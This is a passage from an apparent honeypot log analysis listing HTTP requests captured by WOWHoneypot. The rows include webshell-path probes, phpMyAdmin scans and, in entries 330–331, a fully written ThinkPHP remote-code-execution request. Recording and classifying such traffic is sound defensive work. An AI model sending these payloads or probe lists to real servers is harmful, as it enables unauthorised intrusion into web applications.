291. WebShell probing POST /win1.php HTTP/1.1 1 - 0 +1
292. WebShell probing POST /linux.php HTTP/1.1 1 - 0 +1
293. WebShell probing POST /linux1.php HTTP/1.1 1 - 0 +1
294. WebShell probing POST /cc.php HTTP/1.1 1 - 0 +1
295. WebShell probing POST /lanke.php HTTP/1.1 1 - 0 +1
296. WebShell probing POST /neko.php HTTP/1.1 1 - 0 +1
297. WebShell probing POST /super.php HTTP/1.1 1 - 0 +1
298. WebShell probing POST /cere.php HTTP/1.1 1 - 0 +1
299. WebShell probing POST /aaa.php HTTP/1.1 1 - 0 +1
300. WebShell probing POST /Administrator.php HTTP/1.1 1 - 0 +1
301. WebShell probing POST /liangchen.php HTTP/1.1 1 - 0 +1
302. WebShell probing POST /meng.php HTTP/1.1 1 - 0 +1
303. WebShell probing POST /no.php HTTP/1.1 1 - 0 +1
304. WebShell probing POST /mysql.php HTTP/1.1 1 - 0 +1
305. WebShell probing POST /Updata.php HTTP/1.1 1 - 0 +1
306. WebShell probing POST /xxxx.php HTTP/1.1 1 - 0 +1
307. WebShell probing POST /coon.php HTTP/1.1 1 - 0 +1
308. WebShell probing POST /zxc0.php HTTP/1.1 1 - 0 +1
309. WebShell probing POST /zxc2.php HTTP/1.1 1 - 0 +1
310. WebShell probing POST /indexa.php HTTP/1.1 1 - 0 +1
311. WebShell probing POST /lx.php HTTP/1.1 1 - 0 +1
312. WebShell probing POST /cn.php HTTP/1.1 1 - 0 +1
313. WebShell probing POST /index1.php HTTP/1.1 1 - 0 +1
314. WebShell probing POST /info.php HTTP/1.1 1 - 0 +1
315. WebShell probing POST /info1.php HTTP/1.1 1 - 0 +1
316. WebShell probing POST /aaaaaa1.php HTTP/1.1 1 - 0 +1
317. WebShell probing POST /up.php HTTP/1.1 1 - 0 +1
318. WebShell probing POST /fb.php HTTP/1.1 1 - 0 +1
319. WebShell probing POST /cnm.php HTTP/1.1 1 - 0 +1
320. WebShell probing POST /51.php HTTP/1.1 1 - 0 +1
321. WebShell probing POST /cadre.php HTTP/1.1 1 - 0 +1
322. WebShell probing POST /mm.php HTTP/1.1 1 - 0 +1
323. WebShell probing POST /1q.php HTTP/1.1 1 - 0 +1
324. WebShell probing POST /1111.php HTTP/1.1 1 - 0 +1
325. WebShell probing POST /errors.php HTTP/1.1 1 - 0 +1
326. phpMyAdmin probing GET /s/index.php HTTP/1.1 1 - 0 +1
327. phpMyAdmin probing GET /phpMyAdmins/index.php HTTP/1.1 1 - 0 +1
328. phpMyAdmin probing GET /mysql/sqlmanager/index.php HTTP/1.1 1 - 0 +1
329. ThinkPHP probing GET /TP/public/index.php HTTP/1.1 1 - 0 +1
330. Attack exploiting the ThinkPHP vulnerability (reference) GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 1 - 0 +1
331. Attack exploiting the ThinkPHP vulnerability (reference) POST /TP/public/index.php?s=captcha HTTP/1.1 1 - 0 +1
332. Unknown GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1 1 - 0 +1

That concludes the brief analysis of the logs captured by WOWHoneypot.